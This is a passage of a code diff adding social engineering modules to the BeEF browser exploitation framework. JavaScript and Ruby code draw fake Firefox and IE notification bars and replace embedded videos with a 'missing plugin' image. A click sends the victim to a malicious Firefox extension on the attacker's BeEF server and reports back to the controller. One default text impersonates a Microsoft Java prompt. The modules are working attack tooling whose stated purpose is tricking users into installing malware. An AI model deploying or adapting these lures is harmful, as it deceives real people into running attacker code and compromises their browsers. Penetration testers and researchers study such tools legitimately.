aAwesDQEz1/qC1RvBXP1zgAAAABJRU5ErkJggg==);'});
+	var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+	var elp = beef.dom.createElement('div',{'id':pid,'style':'margin: 2px 50px 0 4px; height: 25px; line-height: 25px; font-family: sans-serif; font-size: 12px; padding-bottom: 5px'});
+	$j('body').append(el);
+	var hid = '#'+id;
+	var hpid = '#'+pid;
+	$j(hid).append(elp);
+	$j(hpid).html("<%= @notification_text %>&nbsp;<img style='padding:0; margin:5px; position: absolute; top: 0;' src='data:image/png;base64,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'>");
+	$j(hid).append(ell);
+	//$j(hid).append("<u>Problems installing?</u>&nbsp;");
+	$j(hid).append(elr);
+	$j(hid).click(function() {
+		$j(this).slideUp(300,function() {
+			$j(this).remove();
+		});
+		window.location = '<%= @url %>';
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+	});
+	$j(hid).css('cursor','pointer');
+	$j(hid).slideDown(300,function() {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+	});
+
+});

modules/social_engineering/fake_notification_ff/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_ff:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (Firefox)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in Firefox. If the user clicks the notification they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["xntrik", "bcoles"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification_ff/module.rb

@@ -0,0 +1,32 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification_ff < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port") +'/api/ipec/ff_extension'
+    return [
+      {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url, 'width'=>'150px'},
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
+        'value' => "An additional plug-in is required to display some elements on this page."
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

modules/social_engineering/fake_notification_ie/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification_ie:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification Bar (IE)"
+            description: "Displays a fake notification bar at the top of the screen, similar to those presented in IE."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/fake_notification_ie/module.rb

@@ -3,13 +3,13 @@
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
-class Fake_notification < BeEF::Core::Command
+class Fake_notification_ie < BeEF::Core::Command
 
   def self.options
     return [
       { 'name' => 'notification_text',
         'description' => 'Text displayed in the notification bar',
-        'ui_label' => 'Text displayed in the notification bar',
+        'ui_label' => 'Notification text',
         'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
       }
     ]

modules/social_engineering/replace_video_fake_plugin/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        replace_video_fake_plugin:
+            enable: true
+            category: ["Social Engineering"]
+            name: "Replace Videos (Fake Plugin)"
+            description: "Replaces an object selected with jQuery (all embed tags by default) with an image advising the user to install a missing plugin. If the user clicks the image they will be prompted to download a malicious Firefox extension (by default)."
+            authors: ["Yori Kvitchko", "antisnatchor", "bcoles"]
+            target:
+                user_notify: ['ALL']

modules/social_engineering/replace_video_fake_plugin/module.rb

@@ -0,0 +1,24 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Replace_video_fake_plugin < BeEF::Core::Command
+
+  def self.options
+    @configuration = BeEF::Core::Configuration.instance
+    beef_host = @configuration.get("beef.http.public") || @configuration.get("beef.http.host")
+    url = 'http://' + beef_host + ':' + @configuration.get("beef.http.port")
+    return [
+        {'name' => 'url', 'ui_label' => 'Plugin URL', 'value' => url+'/api/ipec/ff_extension', 'width'=>'150px'},
+        {'name' => 'jquery_selector', 'ui_label' => 'jQuery Selector', 'value' => 'embed', 'width'=>'150px'}
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end